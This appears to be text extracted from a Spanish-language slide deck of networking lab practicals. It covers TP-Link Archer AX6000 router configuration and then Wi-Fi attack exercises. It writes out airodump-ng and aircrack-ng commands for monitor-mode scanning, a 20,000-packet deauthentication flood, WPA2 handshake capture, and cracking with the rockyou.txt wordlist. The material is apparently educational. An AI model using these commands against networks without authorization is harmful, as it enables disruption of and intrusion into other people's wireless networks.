Presentación sin título
Presentación sin título
Presentación sin título
Estado de Internet
● Tipo de Conexión.
● Dirección MAC WAN.
● Dirección IP de Internet.
● Duración en línea.
Red inalámbrica
Red de invitados
● Wi-Fi 2.4GHz.
○ Nombre de red (SSID).
● Wi-Fi GHz.
○ Nombre de red (SSID).
En Mapa de Red > Archer AX6000
Práctica 1.- Configuración de un punto de acceso
Funcionamiento
● Carga de la CPU.
● Uso de la Memoria.
Estado de Ethernet
● Tipo de dispositivo
● Información
● Velocidad a tiempo Real
● Interfaz
● Velocidad Tx/Rx (Mbps)
● Duración
● Bloquear
[En la parte superior derecha de la tabla viene la opción “Ver lista negra”
En Mapa de Red > Clientela
donde podremos ver los dispositivos bloqueados]
Práctica 1.- Configuración de un punto de acceso
Configuración del Internet
Clonado de MAC:
En Internet.
Práctica 1.- Configuración de un punto de acceso
Configuración de Red Inalámbrica
● OFDMA: Tecnología que mejora la eficiencia y reduce la
latencia en redes Wi-Fi, permitiendo que varios dispositivos
transmitan datos simultáneamente.
● Conexión inteligente: Característica que optimiza
automáticamente la conexión del dispositivo al mejor canal
o Banda disponible (2.4GHz o 5GHz), mejorando el
rendimiento y la cobertura.
● Radio inalámbrico
● Nombre de red (SSID)
○ Ocultar SSID
● 2.4GHz
● 5GHz
● Estado
● Tipo de Conexión a Internet:
● Dirección IP
● Submascara de Red
● Puerta de Enlace
● DNS Primario
● DNS Secundario
● Duración en línea
Clonado de MAC.
● Dirección MAC
● Dirección IP
● Submáscara de Red
Agregación de Enlace
● Agregación de Enlace
Reserva de Direcciones
● Nombre de Dispositivo
● Dirección MAC
● Dirección IP Reservada
● Estado
● Modificar
Para verificar que se haya activado el modo monitor en nuestra interfaz de red,
utilizamos el comando que ya hemos usado anteriormente para ver el estado de
nuestra interfaz inalámbrica.
● Detención de los puntos de acceso cercanos
# airodump-ng wlan0
● Cambiar de canal
La interfaz de red debe de estar en el mismo canal del punto de acceso al que le
realizaremos la prueba de inyección.
Una vez estando en el mismo canal del AP podemos ejecutar el comando para la
inyección.
-a 40:3F:8C:EC:66:5B: Especifica la
dirección MAC del punto de acceso
(AP) al que se desea realizar la prueba
de inyección.
--deauth 20000: Esta opción indica que se enviarán 20,000 paquetes de desautenticación.
# airodump-ng wlan0
Práctica 7.- Cracking WEP: Básico
Práctica 8.- Cracking WEP/WPA2
WPA2-PSK [AES]
Esta práctica implica romper la seguridad de una red Wi-Fi protegida por acceso WPA
II con una clave precompartida (PSK) y el estándar de cifrado avanzado (AES).
● Captura de Handshake
# airodump-ng --bssid 40:3F:8C:EC:66:5B --channel 5 --write practica7 wlan0
Desautenticamos a un cliente dentro de la red para capturar el handshake.
● Crackeo del Handshake
#sudo aircrack-ng -w rockyou.txt -b 40:3F:8C:EC:66:5B ~/Pictures/Practica\ 7/practica7-02.cap
-w rockyou.txt: Este archivo contiene una lista de posibles contraseñas que se probarán para
descifrar la clave WPA2-PSK[AES].
● Confirmamos la importación.
Activar Conexión
Paso #8: Una vez se haya importado
el perfil de conexión de nuestro
servidor VPN, lo que deberemos
hacer es activar la conexión.
Pruebas de Conexión (ipconfig)